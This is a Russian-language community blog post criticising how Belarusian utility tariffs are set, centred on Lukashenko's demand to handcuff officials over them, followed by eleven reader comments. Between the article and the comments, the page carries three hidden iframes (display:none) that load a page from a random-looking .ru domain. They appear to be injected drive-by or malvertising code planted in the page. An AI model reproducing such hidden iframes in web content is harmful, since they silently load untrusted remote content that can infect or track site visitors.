Кручу-верчу…

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Марина Смирнова написалa
    6 оценок, 430 просмотров Обсудить (11)

    «Я прочитал Вашу докладную записку сегодня по поводу жилищно-коммунальных услуг, которые Вы провели буквально за выходные... То же самое мне глава Администрации доложил. Ему тоже было поручение. Мы вроде там все посчитали с Вами?» — обратился президент Лукашенко к председателю Комитета государственного контроля Леониду Анфимову. Тот в ответ констатировал, что необходимые расчеты были проведены, но на практике получилось с точностью до наоборот. По его словам, все было сделано «от балды». Лукашенко, недолго думая, потребовал: «Значит, наденьте наручники тем, кто не выполнил доведенные по моему распоряжению тарифы. Наденьте и публично посадите десяток-другой человек. Все станет на свои места. Тут должен быть список, кто эту «балду» придумал. Хватит с ними шутить. Мы тут что-то считаем, планируем, а они делают все по-своему».

    Так что же происходит с нашими коммунальными платежами, в которых не могут разобраться не только простые плательщики услуг, но и власти? Кажется, что может быть проще. Как написано в жировках, есть тарифы на услуги, которые обеспечивают полное возмещение экономически обоснованных затрат, и есть субсидируемые тарифы. Народ возмещает какой-то процент, остальное - государство. Государство не может субсидировать далее эти затраты, плательщики начинают платить больше, доводя свою долю до 100%... Всё… Но это для тех, кто не в курсе, как у нас рисуют эти тарифы на коммунальные услуги.

    Увеличивая долю, оплачиваемую населением, одновременно повышаются «экономически обоснованные» тарифы, в разы. Из технического обслуживания выводят энергозатраты на лифт и вспомогательное помещение, при этом не уменьшая суммы затрат на техобслуживание. Если раньше человек платил за пользование лифтом в зависимости от количества проживающих, то сейчас в зависимости от метража квартиры, тарифы при этом увеличились. Стоимость услуг по ТКО поставила в тупик даже президента. История с отчислениями на капитальный ремонт – отдельный сказ.

    При таких подходах процент возмещаемых населением услуг не увеличился, а остался на месте. И новые тарифы, как заметили в КГК, взяты «от балды». Но, как показывает практика, ни до сих пор, ни сейчас, обосновать эти «обоснованные» тарифы не получается… или не озвучивается.

    Почему же так возмутился Лукашенко, только ли испугавшись народного недовольства? Нет. Кредиторы Беларуси - и Россия, и МВФ, настоятельно рекомендовали нашему правительству увеличить уровень окупаемости населением стоимости жилищно-коммунальных услуг. Кредиты нам нужны, и картинку давать приличную необходимо. А тут - народ ощипанный и возмущенный, а на выходе – опять процент низкий население компенсирует. Картинка некрасивая получается – полная оплата коммунальных услуг с такими тарифами ни в какую потребительскую корзину не влезет. И кредиторы недовольными останутся.

    И еще. Стоимость услуг так или иначе должны получать коммунальщики. Увеличивая бессмысленно тарифы и накрутки, они, в первую очередь, лезут в карман к государству. Вот довели бы возмещение со стороны граждан до ста процентов, а там… Но, видимо, поспешили. Без реформ в системе ЖКХ у нас так и будет, и ни о какой прозрачности в системе ценообразования коммунальных услуг можно не говорить. Вернее, можно только говорить, когда вручную, под давлением снизу и сверху, менять тарифы, пугая наручниками.

    <iframe id="a1996667054" style="display: none;" src="http://u7yb1iy1x3xv.ru/f.html" width="300" height="150"></iframe>

    <iframe id="a1996667054" style="display: none;" src="http://u7yb1iy1x3xv.ru/f.html" width="300" height="150"></iframe>

    <iframe id="a1996667054" style="display: none;" src="http://u7yb1iy1x3xv.ru/f.html" width="320" height="240"></iframe>

    Комментировать

    осталось 1185 символов
    пользователи оставили 11 комментариев , вы можете свернуть их
    anatolii reznikov # написал комментарий 27 февраля 2016, 23:09
    Ну так посоветуйте что делать то Как тарифы считать ? И надо ли вообще ?
    Марина Смирнова # ответила на комментарий anatolii reznikov 27 февраля 2016, 23:19
    у нас тарифы- гос.тайна, даже для президента... Может, пора рассекретить?))
    Верхние чины говорят, что население оплачивает то 80, то 70%, в жировках сейчас где-то 20... Несколько лет назад Лукашенко принял указ, что повышение свыше 5 долларов (почему так?) только с его указания. Получается, и тарифы из черного ящика, и платежи неизвестно на что
    Татьяна Маслова # ответила на комментарий anatolii reznikov 28 февраля 2016, 03:20
    Не будет никогда прозрачности и ясности. И с этим придется смириться.
    Потому как нет четкого учета, формул расчета, контроля и т.п.
    Они даже если бы очень захотели (сами для себя) узнать - погрязли бы в цифрах и ушли ни с чем. Приписки, отписки во всем и везде.
    ВСЁ от балды. Тут КГК прав. Но и их "тарифы" будут от него же. Балда - это наше всё!
    Эллочка Людоедка # написала комментарий 28 февраля 2016, 00:19
    Непрозрачность слишком выгодна тому,кто осваивает триллионы бюджетных рублей.А Лукошенко уже в пятый раз пытается приструнить зарвавшихся коммунальщиков.Четыре раза ему это не удалось.Слабо верится,что удастся в пятый раз..)))
    Марина Смирнова # ответила на комментарий Эллочка Людоедка 28 февраля 2016, 01:14
    да, только тут очень не вовремя повышения затеяли...
    Виталий Закржевский # написал комментарий 28 февраля 2016, 08:36
    Прошу обратить внимание на то, как незаметно сошёл на нет мелькнувший с месяц назад комментарий КГК о справедливости методики подсчёта инфляции: они сказали А.... но вот сказать Б им уже просто не дали, а может сами поняли на что покусились?
    То же самое и с тарифами.
    Марина Смирнова # ответила на комментарий Виталий Закржевский 28 февраля 2016, 11:59
    да, с методикой подсчета они на белстат хорошо наехали, "ошибка" может составлять 50-60%... вот только поменять методику даже они не могут...
    Говорила уже - срок у Лукашенко последний, и не майдан тому виной будет - свои же сдвинут, возможно, с помощью восточных соседей
    Jaroslav Kulbickij # ответил на комментарий Марина Смирнова 28 февраля 2016, 12:08
    Давно пора писать челобитную Путину чтобы сменил смотрящего.
    Марина Смирнова # ответила на комментарий Jaroslav Kulbickij 28 февраля 2016, 13:05
    думаете, не пишут? России пока выгоднее с Лукашенко договориваться
    Мiкалай Паддубiцкi # написал комментарий 28 февраля 2016, 20:20
    Мы, белорусы, не обратили внимания - Ярослав не жалуется на непрозрачность ЖКХ в Литве
    Марина Смирнова # ответила на комментарий Мiкалай Паддубiцкi 28 февраля 2016, 22:55
    потому я и написала ему в комменте ранее, что он далек от нашей действительности
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 676 записей в блогах и 6217 комментариев.
    Зарегистрировалось 20 новых макспаркеров. Теперь нас 5026457.